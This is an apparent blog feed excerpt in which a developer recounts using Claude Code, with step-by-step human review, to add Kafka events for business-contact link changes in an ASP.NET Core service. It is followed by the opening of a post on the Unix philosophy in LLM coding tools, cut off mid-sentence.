<p class="notice">Note that I have configured a lot of context in <code class="language-plaintext highlighter-rouge">CLAUDE.md</code> and linked files, including things like project structure, idioms, how to run tests, MCP servers to use, and more. The context helps a lot, but is a bit too much detail for this post.</p>

<p>I started prompting Claude Code with</p>

<blockquote>
  <p>How do we currently trigger sending Kafka events?</p>
</blockquote>

<p>This was more for my understanding than anything, but also meant Claude loaded up more on the code structure - everything it has seen in a session so far makes up its context, so having this knowledge helps with the next stage.</p>

<p>Then the main prompt:</p>

<blockquote>
  <p>“OK - I’d like to add a specific kind of event - but only when a relationship between a Business and a Contact changes. If a Contact is added to a Business, or removed from a Business, we need to send an event of type PersonBusinessLink which is defined in these classes:</p>
</blockquote>

<div class="language-csharp highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  <span class="k">namespace</span> <span class="nn">Liberis.Events.ThisProject</span>
  <span class="k">public</span> <span class="n">record</span> <span class="nf">PersonBusinessLink</span><span class="p">()</span>
  <span class="p">{</span>
    <span class="k">public</span> <span class="kt">string</span><span class="p">?</span> <span class="n">PersonId</span> <span class="p">{</span> <span class="k">get</span><span class="p">;</span> <span class="k">set</span><span class="p">;</span> <span class="p">}</span>
    <span class="k">public</span> <span class="kt">string</span><span class="p">?</span> <span class="n">BusinessId</span> <span class="p">{</span> <span class="k">get</span><span class="p">;</span> <span class="k">set</span><span class="p">;</span> <span class="p">}</span>
    <span class="k">public</span> <span class="n">PersonBusinessLinkType</span> <span class="n">Type</span> <span class="p">{</span> <span class="k">get</span><span class="p">;</span> <span class="k">set</span><span class="p">;</span> <span class="p">}</span>
  <span class="p">}</span>

  <span class="k">public</span> <span class="k">enum</span> <span class="nf">PersonBusinessLinkType</span><span class="p">()</span>
  <span class="p">{</span>
    <span class="n">PersonBusinessLinked</span><span class="p">,</span>
    <span class="n">PersonBusinessUnlinked</span><span class="p">,</span>
  <span class="p">}</span>
</code></pre></div></div>

<blockquote>
  <p>these events should be generated with the type PersonBusinessLinked if a person is added, and PersonBusinessUnlinked if a person is removed - note this mimics the existing Contact domain entity which links a Business to a Person.</p>
</blockquote>

<p>I pasted in the classes because they are generated from protobuf schemas in another project and I don’t think Claude has access to the decompiled code - it’d be interesting to work out if it could be taught to read it.</p>

<h2 id="claudes-first-attempt">Claude’s first attempt</h2>

<p>Claude churned away for a while - and produced a quite good first pass; it modified</p>

<ul>
  <li>The Business service when a business was created, or modified, or patched
    <ul>
      <li>more on this below</li>
    </ul>
  </li>
  <li>a new Domain type was added for <code class="language-plaintext highlighter-rouge">PersonBusinessLinkType</code> (following project conventions)</li>
  <li>a new Mapper method was added which took a <code class="language-plaintext highlighter-rouge">Contact</code>, a <code class="language-plaintext highlighter-rouge">businessId</code> and a <code class="language-plaintext highlighter-rouge">PersonBusinessLinkType</code> and generated a Kafka message</li>
  <li>a new Kafka topic was added “person-business-link” - this was a guess on Claude’s part, and not quite right</li>
  <li>a new handler was added to our KafkaEventDispatcher to dispatch messages to the right topic based on the new event type</li>
  <li>the Dispatcher was injected into the BusinessService</li>
</ul>

<h3 id="course-correcting-not-vibe-coding">Course correcting not vibe coding</h3>

<p>I should note, I didn’t just leave Claude going - you don’t want to let it go too far off piste<sup id="fnref:1" role="doc-noteref"><a href="#fn:1" class="footnote" rel="footnote">1</a></sup>, so I kept an eye on changes. I have it set up to ask me before every change, so when it chose the wrong Kafka topic I said “no” to the proposed change, then told it the right topic, and it kept on going.</p>

<p>Sometimes on simple tasks I let it do more steps without checking, but that means more work cleaning up later; this is one of the interesting learning exercises working this way, determining when to be slow and careful, and when to be fast but need more clean-up effort later.</p>

<p>These are the sorts of corrections I had to make:</p>

<ul>
  <li>“I think you should use the business ID as the partition key” as it chose the wrong key</li>
  <li>“We should dispatch events before committing the unit of work, so the outbox pattern works”</li>
  <li>“This should be in the namespace Foo.Bar as that’s where other similar things are”</li>
  <li>“You don’t need to log anything here, our dispatcher has observability built in”</li>
  <li>“Please don’t add that comment - only comment on things that aren’t obvious”</li>
</ul>

<p>In all these cases though, I didn’t need to write any code, I just guided it occasionally, like I would a junior developer. One who loves comments and logging and excess documentation!</p>

<p>(You can train it out of some of these things, using more initial context - but some habits are harder to shift than others)</p>

<h3 id="fixing-a-bigger-problem">Fixing a bigger problem</h3>

<p>I did catch it making one mistake - our method to patch a business follows roughly this logic:</p>

<ul>
  <li>Start a transaction</li>
  <li>Find the business</li>
  <li>Patch the business, returning the updated complete business object</li>
  <li>… some extra logic around related data that might have changed</li>
  <li>Commit the transaction</li>
  <li>Return a success payload</li>
</ul>

<p>The code Claude wrote was roughly:</p>

<ul>
  <li>Start a transaction</li>
  <li>Find the business</li>
  <li>Patch the business, returning the updated complete business object</li>
  <li>… some extra logic around related data that might have changed</li>
  <li><strong>Check for dispatching person/business updates:</strong>
    <ul>
      <li><strong>Fetch the original unchanged business</strong></li>
      <li><strong>Check whether the original business had added/removed people compared to the new one</strong></li>
      <li><strong>Dispatch any changes</strong></li>
    </ul>
  </li>
  <li>Commit the transaction</li>
  <li>Return a success payload</li>
</ul>

<p>This would probably work, (assuming we could read the pre-transaction data), but was doing unnecessary work. I asked Claude:</p>

<blockquote>
  <p>Can’t we get the original business contact info earlier in the method, rather than at the end?</p>
</blockquote>

<p>And it tried - quite hard - to do this. The trouble is, we aren’t performing the logic above with procedural code - we use chained functions with monadic <code class="language-plaintext highlighter-rouge">Result</code> and <code class="language-plaintext highlighter-rouge">Option</code> return types, so the chain passes a <code class="language-plaintext highlighter-rouge">Result</code> wrapping either a <code class="language-plaintext highlighter-rouge">Business</code> or an <code class="language-plaintext highlighter-rouge">Error</code> payload, and errors get passed down the chain rather than using exceptions. (Or sometimes <code class="language-plaintext highlighter-rouge">Result&lt;Option&lt;Business&gt;&gt;</code> when a function like <code class="language-plaintext highlighter-rouge">FindBusiness</code> might return no business without it being an error) so the code is a bit harder for Claude to understand:</p>

<div class="language-csharp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">var</span> <span class="n">result</span> <span class="p">=</span> <span class="k">await</span> <span class="n">businessRepository</span><span class="p">.</span><span class="nf">FindBusinessAsync</span><span class="p">(...)</span>
  <span class="p">.</span><span class="nf">ThenAsync</span><span class="p">(</span><span class="n">businessToUpdateOption</span> <span class="p">=&gt;</span> <span class="n">businessToUpdateOption</span><span class="p">.</span><span class="nf">Match</span><span class="p">(</span>
    <span class="n">some</span><span class="p">:</span> <span class="k">async</span> <span class="n">businessToUpdate</span> <span class="p">=&gt;</span>
    <span class="p">{</span>
      <span class="c1">// update the business and return the updated business</span>
    <span class="p">}</span>
    <span class="n">none</span><span class="p">:</span> <span class="p">()</span> <span class="p">=&gt;</span> <span class="c1">// no business so we had None - return a new Error result</span>
  <span class="p">))</span>
  <span class="p">.</span><span class="nf">ThenAsync</span><span class="p">(</span><span class="n">updatedBusiness</span> <span class="p">=&gt;</span> 
    <span class="c1">// more business logic if the previous update succeeded</span>
  <span class="p">)</span>
  <span class="p">.</span><span class="nf">ThenAsync</span><span class="p">(</span><span class="k">async</span> <span class="n">updatedBusiness</span> <span class="p">=&gt;</span>
    <span class="kt">var</span> <span class="n">originalBusiness</span> <span class="p">=</span> <span class="c1">// logic to fetch the original business</span>
    <span class="c1">// the new kafka dispatch:</span>
    <span class="k">await</span> <span class="nf">DispatchContactChangeEventsAsync</span><span class="p">(</span><span class="n">originalBusiness</span><span class="p">,</span> <span class="n">updatedBusiness</span><span class="p">);</span>
    <span class="k">await</span> <span class="n">unitOfWork</span><span class="p">.</span><span class="nf">CommitAsync</span><span class="p">();</span>
    <span class="k">return</span> <span class="nf">Success</span><span class="p">(</span><span class="n">updatedBusiness</span><span class="p">);</span>
  <span class="p">)</span>
</code></pre></div></div>

<p>Claude actually <em>almost</em> managed to fix this. It worked out that instead of passing <code class="language-plaintext highlighter-rouge">Result&lt;businessToUpdate&gt;</code> through the function chain, it should pass a tuple <code class="language-plaintext highlighter-rouge">Result&lt;(originalBusiness, businessToUpdate)&gt;</code> and re-threaded all the functions to match:</p>

<div class="language-csharp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">var</span> <span class="n">result</span> <span class="p">=</span> <span class="k">await</span> <span class="n">businessRepository</span><span class="p">.</span><span class="nf">FindBusinessAsync</span><span class="p">(...)</span>
  <span class="p">.</span><span class="nf">ThenAsync</span><span class="p">(</span><span class="n">businessToUpdateOption</span> <span class="p">=&gt;</span> <span class="n">businessToUpdateOption</span><span class="p">.</span><span class="nf">Match</span><span class="p">(</span>
    <span class="n">some</span><span class="p">:</span> <span class="k">async</span> <span class="n">businessToUpdate</span> <span class="p">=&gt;</span>
    <span class="p">{</span>
      <span class="c1">// update the business and then</span>
      <span class="k">return</span> <span class="nf">Result</span><span class="p">(</span><span class="n">businessToUpdate</span><span class="p">,</span> <span class="n">updatedBusiness</span><span class="p">)</span>
    <span class="p">}</span>
    <span class="n">none</span><span class="p">:</span> <span class="p">()</span> <span class="p">=&gt;</span> <span class="c1">// no business so we had None - return a new Error result</span>
  <span class="p">))</span>
  <span class="p">.</span><span class="nf">ThenAsync</span><span class="p">(</span><span class="n">businessPair</span> <span class="p">=&gt;</span> 
    <span class="c1">// destructure businessPair into (businessToUpdate, updatedBusiness)</span>
    <span class="c1">// more business logic if the previous update succeeded</span>
  <span class="p">)</span>
  <span class="p">.</span><span class="nf">ThenAsync</span><span class="p">(</span><span class="k">async</span> <span class="n">businessPair</span> <span class="p">=&gt;</span>
    <span class="c1">// the new kafka dispatch:</span>
    <span class="k">await</span> <span class="nf">DispatchContactChangeEventsAsync</span><span class="p">(</span><span class="n">businessPair</span><span class="p">.</span><span class="n">Original</span><span class="p">,</span> <span class="n">businessPair</span><span class="p">.</span><span class="n">Updated</span><span class="p">);</span>
    <span class="k">await</span> <span class="n">unitOfWork</span><span class="p">.</span><span class="nf">CommitAsync</span><span class="p">();</span>
    <span class="k">return</span> <span class="nf">Success</span><span class="p">(</span><span class="n">businessPair</span><span class="p">.</span><span class="n">Updated</span><span class="p">);</span>
  <span class="p">)</span>
</code></pre></div></div>

<p>But - it hit a syntax error. One of the error paths (not shown) was still returning <code class="language-plaintext highlighter-rouge">Result&lt;Business&gt;</code> not the tuple. It tried a few times to correct it, but it gave up and said “I think the logic is right but there are still a few syntax errors”</p>

<p>To its credit, I’d prefer this than it churning forever or hallucinating an incorrect result. I managed to fix it (with a bit of pain - we override <code class="language-plaintext highlighter-rouge">ThenAsync</code> in ways which make diagnosing this tricky even for a human) and then Claude could take over again.</p>

<h2 id="testing">Testing</h2>

<p>I really should have started with a test! I do have instructions in my context about testing, but neither Claude nor I did this in proper TDD fashion.</p>

<p>But when I asked</p>

<blockquote>
  <p>Can you find an integration test that can test the new event? Just change one test for now to see if it is working.</p>
</blockquote>

<p>Claude went away, found an integration test (we use Test Containers to test against dockerised Kafka) and modified it quite sensibly. It took a test that was roughly:</p>

<div class="language-csharp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">[</span><span class="n">Fact</span><span class="p">]</span>
<span class="k">public</span> <span class="k">async</span> <span class="n">Task</span> <span class="nf">UpdateBusinessAsync_UpdatesBusiness</span><span class="p">()</span>
<span class="p">{</span>
  <span class="c1">// Arrange</span>
  <span class="kt">var</span> <span class="n">businessRequest</span> <span class="p">=</span> <span class="nf">ARandomBusinessRequest</span><span class="p">(...);</span>
  <span class="kt">var</span> <span class="n">createBusinessResponse</span> <span class="p">=</span> <span class="k">await</span> <span class="nf">CreateBusinessAsync</span><span class="p">(</span><span class="n">businessRequest</span><span class="p">);</span>
  <span class="kt">var</span> <span class="n">updatedBusiness</span> <span class="p">=</span> <span class="c1">// logic to update the business including new People</span>
  <span class="c1">// Act</span>
  <span class="kt">var</span> <span class="n">response</span> <span class="p">=</span> <span class="k">await</span> <span class="nf">UpdateBusinessAsync</span><span class="p">(</span><span class="n">updatedBusiness</span><span class="p">)</span>
  <span class="c1">// Assert</span>
  <span class="kt">var</span> <span class="n">getBusinessResponse</span> <span class="p">=</span> <span class="k">await</span> <span class="nf">GetBusinessAsync</span><span class="p">(</span><span class="n">createBusinessResponse</span><span class="p">.</span><span class="n">Id</span><span class="p">);</span>
  <span class="c1">// lots of assertions</span>
<span class="p">}</span>
</code></pre></div></div>

<p>And made it</p>
<div class="language-csharp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">[</span><span class="n">Fact</span><span class="p">]</span>
<span class="k">public</span> <span class="k">async</span> <span class="n">Task</span> <span class="nf">UpdateBusinessAsync_UpdatesBusiness</span><span class="p">()</span>
<span class="p">{</span>
  <span class="c1">// Reset shared state</span>
  <span class="nf">ClearReceivedKafkaEvents</span><span class="p">(</span><span class="n">Topics</span><span class="p">.</span><span class="n">PersonBusinessLink</span><span class="p">);</span>

  <span class="c1">// Arrange</span>
  <span class="kt">var</span> <span class="n">businessRequest</span> <span class="p">=</span> <span class="nf">ARandomBusinessRequest</span><span class="p">(...);</span>
  <span class="kt">var</span> <span class="n">createBusinessResponse</span> <span class="p">=</span> <span class="k">await</span> <span class="nf">CreateBusinessAsync</span><span class="p">(</span><span class="n">businessRequest</span><span class="p">);</span>
  <span class="kt">var</span> <span class="n">updatedBusiness</span> <span class="p">=</span> <span class="c1">// logic to update the business including new People</span>
  <span class="c1">// Act</span>
  <span class="kt">var</span> <span class="n">response</span> <span class="p">=</span> <span class="k">await</span> <span class="nf">UpdateBusinessAsync</span><span class="p">(</span><span class="n">updatedBusiness</span><span class="p">)</span>
  <span class="c1">// Assert</span>
  <span class="kt">var</span> <span class="n">getBusinessResponse</span> <span class="p">=</span> <span class="k">await</span> <span class="nf">GetBusinessAsync</span><span class="p">(</span><span class="n">createBusinessResponse</span><span class="p">.</span><span class="n">Id</span><span class="p">);</span>
  <span class="c1">// same assertions as above then</span>
  <span class="k">await</span> <span class="nf">WaitForConditionAsync</span><span class="p">(</span>
    <span class="p">()</span> <span class="p">=&gt;</span> <span class="n">ReceivedKafkaEvents</span><span class="p">&lt;</span><span class="n">PersonBusinessLink</span><span class="p">&gt;(</span><span class="n">Topics</span><span class="p">.</span><span class="n">PersonBusinessLink</span><span class="p">).</span><span class="nf">Count</span><span class="p">()</span> <span class="p">&gt;=</span> <span class="m">2</span><span class="p">);</span>
  <span class="kt">var</span> <span class="n">linkEvents</span> <span class="p">=</span> <span class="n">ReceivedKafkaEvents</span><span class="p">&lt;</span><span class="n">PersonBusinessLink</span><span class="p">&gt;(</span><span class="n">Topics</span><span class="p">.</span><span class="n">PersonBusinessLink</span><span class="p">);</span>
  <span class="c1">// assert the link events match expectations</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This was basically following the pattern of other tests - but Claude found that pattern, without prompting, in a different test file - Business tests didn’t have any kafka tests at this stage. I was pretty impressed.</p>

<p>And then it ran the tests - and they failed. :)</p>

<p>At this stage Claude started thrashing - trying multiple things that I could see wouldn’t help. So again, I stopped it, then sat down with the debugger and my weak human brain.</p>

<p>(It turns out that I also needed to add a new Producer in our kafka setup - an easy fix, once I found it)</p>

<p>And then the tests passed, Claude helped me add more similar tests for other endpoints, and the task was done.</p>

<h3 id="this-isnt-10x-speed---but-its-not-junk-either">This isn’t 10x speed - but it’s not junk either</h3>

<p>I wanted to post this example as it’s a good midpoint between “AI can replace developers” and “AI is rubbish and produces junk”. More on that in <a href="/2025/07/19/clowns-to-the-left-of-me">my next post</a>.</p>

<p>This worked, with some human guidance. It needed help - maybe with future improvements and better context it will need less help, but I doubt this kind of thing will “just work” any time in the near future. That test failure, for example, needed a lot of investigation a long way from the context of the code or the tests being written.</p>

<p>And I’m working in a similar way, and getting similar benefits, all over the place.</p>

<p>Sometimes the LLM actually works first time - I added a feature flag to our application to turn one feature off in some environments, and the code needed no checks at all. And it’s <em>great</em> at writing small simple on-demand scripts - things like “write a python script to graph our git commits over time” or “write a script to generate a Slack message showing our outstanding pull requests”.</p>

<p>And sometimes it doesn’t help at all - it’s worth learning when to say “ok, this is too trivial / too hard” and writing it yourself.</p>

<p>There is <em>so</em> much to learn here - when to use the tools, how to set up context, what MCP or other external information to bring in - and it’s constantly changing.</p>

<p>But I’m finding it an exciting time - this stuff, used carefully, is very helpful, and a lot of fun.</p>

<h2 id="but-dont-forget-the-downsides">But don’t forget the downsides</h2>

<p>I feel I need a standard disclaimer at the end of any AI post. We need to remember the context behind these tools - there are giant tech companies pushing these hard into every corner of our lives. They are run by horrible tech <a href="https://en.wikipedia.org/wiki/Broligarchy">broligarchs</a><sup id="fnref:broligarchy" role="doc-noteref"><a href="#fn:broligarchy" class="footnote" rel="footnote">2</a></sup> whose interests are personal power and destabilising democracy, not helping the world.</p>

<p>They consume vast amounts of power, which due to our failure to charge for <a href="https://en.wikipedia.org/wiki/Externality">externalities</a>, mean they are burning fossil fuels, consuming scarce water, and accelerating the climate crisis. And there are many signs that the funding for this is <a href="https://www.wheresyoured.at/subprimeai/">an unsustainable bubble</a> and the companies and tools may collapse, or start charging significantly more and/or enshittifying the experience of users.</p>

<div class="footnotes" role="doc-endnotes">
  <ol>
    <li id="fn:1" role="doc-endnote">
      <p>yet again, follow the mantra ‘treat the LLM like a very fast keen naive junior developer with lots of resources but no long-term knowledge’ <a href="#fnref:1" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:broligarchy" role="doc-endnote">
      <p>Thanks <a href="https://broligarchy.substack.com/about">Carole Cadwalla</a> for introducing me to the very useful term <a href="https://en.wikipedia.org/wiki/Broligarchy">Broligarchy</a>! <a href="#fnref:broligarchy" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
  </ol>
</div>]]></content><author><name>Korny Sietsma</name></author><category term="AI" /><category term="software development" /><category term="ai" /><category term="software-development" /><category term="claude" /><category term="asp.net" /><summary type="html"><![CDATA[I thought it’d be worth posting an example of a bigger task I did the other day - just to show what can be done, without crazy vibe-coding, on a non-greenfields app, using ASP.Net Core not some simplistic front-end tooling. This was originally part of a longer post but I thought it was worth splitting - this example is used in my post Clowns to the left of me … The task - Sending a message when data changes We have an ASP.Net core application which includes a relationship between Businesses and People, where that relationship is modeled as a collection of Contacts: erDiagram BUSINESS { Guid Id PK } CONTACT { Guid BusinessId PK,FK Guid PersonId PK,FK } PERSON { Guid Id PK } BUSINESS ||--o{ CONTACT : "has" PERSON ||--o{ CONTACT : "is a" Note that I have configured a lot of context in CLAUDE.md and linked files, including things like project structure, idioms, how to run tests, MCP servers to use, and more. The context helps a lot, but is a bit too much detail for this post. I started prompting Claude Code with How do we currently trigger sending Kafka events? This was more for my understanding than anything, but also meant Claude loaded up more on the code structure - everything it has seen in a session so far makes up its context, so having this knowledge helps with the next stage. Then the main prompt: “OK - I’d like to add a specific kind of event - but only when a relationship between a Business and a Contact changes. If a Contact is added to a Business, or removed from a Business, we need to send an event of type PersonBusinessLink which is defined in these classes: namespace Liberis.Events.ThisProject public record PersonBusinessLink() { public string? PersonId { get; set; } public string? BusinessId { get; set; } public PersonBusinessLinkType Type { get; set; } } public enum PersonBusinessLinkType() { PersonBusinessLinked, PersonBusinessUnlinked, } these events should be generated with the type PersonBusinessLinked if a person is added, and PersonBusinessUnlinked if a person is removed - note this mimics the existing Contact domain entity which links a Business to a Person. I pasted in the classes because they are generated from protobuf schemas in another project and I don’t think Claude has access to the decompiled code - it’d be interesting to work out if it could be taught to read it. Claude’s first attempt Claude churned away for a while - and produced a quite good first pass; it modified The Business service when a business was created, or modified, or patched more on this below a new Domain type was added for PersonBusinessLinkType (following project conventions) a new Mapper method was added which took a Contact, a businessId and a PersonBusinessLinkType and generated a Kafka message a new Kafka topic was added “person-business-link” - this was a guess on Claude’s part, and not quite right a new handler was added to our KafkaEventDispatcher to dispatch messages to the right topic based on the new event type the Dispatcher was injected into the BusinessService Course correcting not vibe coding I should note, I didn’t just leave Claude going - you don’t want to let it go too far off piste1, so I kept an eye on changes. I have it set up to ask me before every change, so when it chose the wrong Kafka topic I said “no” to the proposed change, then told it the right topic, and it kept on going. Sometimes on simple tasks I let it do more steps without checking, but that means more work cleaning up later; this is one of the interesting learning exercises working this way, determining when to be slow and careful, and when to be fast but need more clean-up effort later. These are the sorts of corrections I had to make: “I think you should use the business ID as the partition key” as it chose the wrong key “We should dispatch events before committing the unit of work, so the outbox pattern works” “This should be in the namespace Foo.Bar as that’s where other similar things are” “You don’t need to log anything here, our dispatcher has observability built in” “Please don’t add that comment - only comment on things that aren’t obvious” In all these cases though, I didn’t need to write any code, I just guided it occasionally, like I would a junior developer. One who loves comments and logging and excess documentation! (You can train it out of some of these things, using more initial context - but some habits are harder to shift than others) Fixing a bigger problem I did catch it making one mistake - our method to patch a business follows roughly this logic: Start a transaction Find the business Patch the business, returning the updated complete business object … some extra logic around related data that might have changed Commit the transaction Return a success payload The code Claude wrote was roughly: Start a transaction Find the business Patch the business, returning the updated complete business object … some extra logic around related data that might have changed Check for dispatching person/business updates: Fetch the original unchanged business Check whether the original business had added/removed people compared to the new one Dispatch any changes Commit the transaction Return a success payload This would probably work, (assuming we could read the pre-transaction data), but was doing unnecessary work. I asked Claude: Can’t we get the original business contact info earlier in the method, rather than at the end? And it tried - quite hard - to do this. The trouble is, we aren’t performing the logic above with procedural code - we use chained functions with monadic Result and Option return types, so the chain passes a Result wrapping either a Business or an Error payload, and errors get passed down the chain rather than using exceptions. (Or sometimes Result&lt;Option&lt;Business&gt;&gt; when a function like FindBusiness might return no business without it being an error) so the code is a bit harder for Claude to understand: var result = await businessRepository.FindBusinessAsync(...) .ThenAsync(businessToUpdateOption =&gt; businessToUpdateOption.Match( some: async businessToUpdate =&gt; { // update the business and return the updated business } none: () =&gt; // no business so we had None - return a new Error result )) .ThenAsync(updatedBusiness =&gt; // more business logic if the previous update succeeded ) .ThenAsync(async updatedBusiness =&gt; var originalBusiness = // logic to fetch the original business // the new kafka dispatch: await DispatchContactChangeEventsAsync(originalBusiness, updatedBusiness); await unitOfWork.CommitAsync(); return Success(updatedBusiness); ) Claude actually almost managed to fix this. It worked out that instead of passing Result&lt;businessToUpdate&gt; through the function chain, it should pass a tuple Result&lt;(originalBusiness, businessToUpdate)&gt; and re-threaded all the functions to match: var result = await businessRepository.FindBusinessAsync(...) .ThenAsync(businessToUpdateOption =&gt; businessToUpdateOption.Match( some: async businessToUpdate =&gt; { // update the business and then return Result(businessToUpdate, updatedBusiness) } none: () =&gt; // no business so we had None - return a new Error result )) .ThenAsync(businessPair =&gt; // destructure businessPair into (businessToUpdate, updatedBusiness) // more business logic if the previous update succeeded ) .ThenAsync(async businessPair =&gt; // the new kafka dispatch: await DispatchContactChangeEventsAsync(businessPair.Original, businessPair.Updated); await unitOfWork.CommitAsync(); return Success(businessPair.Updated); ) But - it hit a syntax error. One of the error paths (not shown) was still returning Result&lt;Business&gt; not the tuple. It tried a few times to correct it, but it gave up and said “I think the logic is right but there are still a few syntax errors” To its credit, I’d prefer this than it churning forever or hallucinating an incorrect result. I managed to fix it (with a bit of pain - we override ThenAsync in ways which make diagnosing this tricky even for a human) and then Claude could take over again. Testing I really should have started with a test! I do have instructions in my context about testing, but neither Claude nor I did this in proper TDD fashion. But when I asked Can you find an integration test that can test the new event? Just change one test for now to see if it is working. Claude went away, found an integration test (we use Test Containers to test against dockerised Kafka) and modified it quite sensibly. It took a test that was roughly: [Fact] public async Task UpdateBusinessAsync_UpdatesBusiness() { // Arrange var businessRequest = ARandomBusinessRequest(...); var createBusinessResponse = await CreateBusinessAsync(businessRequest); var updatedBusiness = // logic to update the business including new People // Act var response = await UpdateBusinessAsync(updatedBusiness) // Assert var getBusinessResponse = await GetBusinessAsync(createBusinessResponse.Id); // lots of assertions } And made it [Fact] public async Task UpdateBusinessAsync_UpdatesBusiness() { // Reset shared state ClearReceivedKafkaEvents(Topics.PersonBusinessLink); // Arrange var businessRequest = ARandomBusinessRequest(...); var createBusinessResponse = await CreateBusinessAsync(businessRequest); var updatedBusiness = // logic to update the business including new People // Act var response = await UpdateBusinessAsync(updatedBusiness) // Assert var getBusinessResponse = await GetBusinessAsync(createBusinessResponse.Id); // same assertions as above then await WaitForConditionAsync( () =&gt; ReceivedKafkaEvents&lt;PersonBusinessLink&gt;(Topics.PersonBusinessLink).Count() &gt;= 2); var linkEvents = ReceivedKafkaEvents&lt;PersonBusinessLink&gt;(Topics.PersonBusinessLink); // assert the link events match expectations } This was basically following the pattern of other tests - but Claude found that pattern, without prompting, in a different test file - Business tests didn’t have any kafka tests at this stage. I was pretty impressed. And then it ran the tests - and they failed. :) At this stage Claude started thrashing - trying multiple things that I could see wouldn’t help. So again, I stopped it, then sat down with the debugger and my weak human brain. (It turns out that I also needed to add a new Producer in our kafka setup - an easy fix, once I found it) And then the tests passed, Claude helped me add more similar tests for other endpoints, and the task was done. This isn’t 10x speed - but it’s not junk either I wanted to post this example as it’s a good midpoint between “AI can replace developers” and “AI is rubbish and produces junk”. More on that in my next post. This worked, with some human guidance. It needed help - maybe with future improvements and better context it will need less help, but I doubt this kind of thing will “just work” any time in the near future. That test failure, for example, needed a lot of investigation a long way from the context of the code or the tests being written. And I’m working in a similar way, and getting similar benefits, all over the place. Sometimes the LLM actually works first time - I added a feature flag to our application to turn one feature off in some environments, and the code needed no checks at all. And it’s great at writing small simple on-demand scripts - things like “write a python script to graph our git commits over time” or “write a script to generate a Slack message showing our outstanding pull requests”. And sometimes it doesn’t help at all - it’s worth learning when to say “ok, this is too trivial / too hard” and writing it yourself. There is so much to learn here - when to use the tools, how to set up context, what MCP or other external information to bring in - and it’s constantly changing. But I’m finding it an exciting time - this stuff, used carefully, is very helpful, and a lot of fun. But don’t forget the downsides I feel I need a standard disclaimer at the end of any AI post. We need to remember the context behind these tools - there are giant tech companies pushing these hard into every corner of our lives. They are run by horrible tech broligarchs2 whose interests are personal power and destabilising democracy, not helping the world. They consume vast amounts of power, which due to our failure to charge for externalities, mean they are burning fossil fuels, consuming scarce water, and accelerating the climate crisis. And there are many signs that the funding for this is an unsustainable bubble and the companies and tools may collapse, or start charging significantly more and/or enshittifying the experience of users. yet again, follow the mantra ‘treat the LLM like a very fast keen naive junior developer with lots of resources but no long-term knowledge’ &#8617; Thanks Carole Cadwalla for introducing me to the very useful term Broligarchy! &#8617;]]></summary></entry><entry><title type="html">The power of the Unix philosophy for LLM agentic tools</title><link href="https://blog.korny.info/2025/07/11/the-power-of-the-unix-philosophy-for-llm-agentic-tools" rel="alternate" type="text/html" title="The power of the Unix philosophy for LLM agentic tools" /><published>2025-07-11T00:00:00+01:00</published><updated>2025-07-11T00:00:00+01:00</updated><id>https://blog.korny.info/2025/07/11/the-power-of-the-unix-philosophy-for-llm-agentic-tools</id><content type="html" xml:base="https://blog.korny.info/2025/07/11/the-power-of-the-unix-philosophy-for-llm-agentic-tools"><![CDATA[<p>I was demonstrating Claude Code to a colleague the other day - I was working on an ASP.Net Core C# service, using Claude within the JetBrains Rider IDE. And my colleague said “it uses a lot of bash commands like <code class="language-plaintext highlighter-rouge">find</code> - why doesn’t it hook into the IDE to understand the structure?”</p>

<p>I was a bit surprised by this - I quite like the way it uses small simple commands. Musing about it afterwards, I realised that this is actually an example of the <a href="https://en.wikipedia.org/wiki/Unix_philosophy">Unix philosophy</a> - “write programs that do one thing and do it well”.</p>

<p>I am already someone who loves diving into the command-line, I have a string of handy tools I use all the time - <a href="https://jqlang.github.io/jq/">jq</a>, <a href="https://github.com/Byron/dua-cli">dua</a>, <a href="https://github.com/BurntSushi/ripgrep">ripgrep</a>, <a href="https://osxdaily.com/2007/03/05/manipulating-the-clipboard-from-the-command-line/">pbcopy and pbpaste</a>, plus all the standard shell tools like find, grep etc - I was already enjoying this aspect of using LLM-based tools; they can be easily trained to use the tools I use already.</p>

<p>But I realise that this also reflects a philosophical difference between different software engineering communities. There are people who love lots of small unix-style tools, who live in the terminal or at least fall back to terminal commands regularly<sup id="fnref:1" role="doc-noteref"><a href="#fn:1" class="footnote" rel="footnote">1</a></sup> - but there are also people who love their IDEs, their smart powerful tooling. It reminds me somewhat of the famous essay <a href="http://www.catb.org/~esr/writings/cathedral-bazaar/cathedral-bazaar/">the Cathedral and the Bazaar</a> from way back in 1998.</p>

<p>A pertinent quote:</p>

<blockquote>
  <p>Linus Torvalds’s style of development—release early and often, delegate everything you can, be open to the point of promiscuity—came as a surprise. No quiet, reverent cathedral-building here—rather, the Linux community seemed to resemble a great babbling bazaar of differing agendas and approaches … out of which a coherent and stable system could seemingly emerge only by a succession of miracles.</p>
</blockquote>

<p>Sounds a bit familiar.<sup id="fnref:2" role="doc-noteref"><a href="#fn:2" class="footnote" rel="footnote">2</a></sup></p>

<p>Anyway - my colleague seemed to be surprised that the LLM wasn’t embracing the large, complicated, sophisticated modelling that a tool like Rider does - in fact up to now you <em>needed</em> a tool like Rider to understand complex ecosystems like ASP.Net.</p>

<p>Whereas I quite like that it <em>doesn’t have to</em> - it uses the Unix philosophy - text-based input and output (which language models naturally work well with), small fast stand-alone tools, that do one thing and one thing well. And despite the continued need for powerful IDEs, the world has shifted - even Cathedrals like ASP.Net now supply quite good command-line tools like <code class="language-plaintext highlighter-rouge">dotnet</code> for building, formatting, linting, and testing, with an LLM-friendly text interface. With all these tools, plus the ability to iterate over solutions and use trial-and-error to course correct, LLM-based tools do a quite good job of what previously needed a huge complex IDE.</p>

<p>Often Claude Code does a <em>better</em> job than the smart IDEs for a lot of refactorings. I remember when refactoring IDEs first appeared, and they were amazing - I could say “extract these lines into a function” and it just worked. But now I can say to Claude “we are doing this repetitive pattern in our tests - can you change it to test against an array using Fluent Assertions instead?” and it turns:</p>

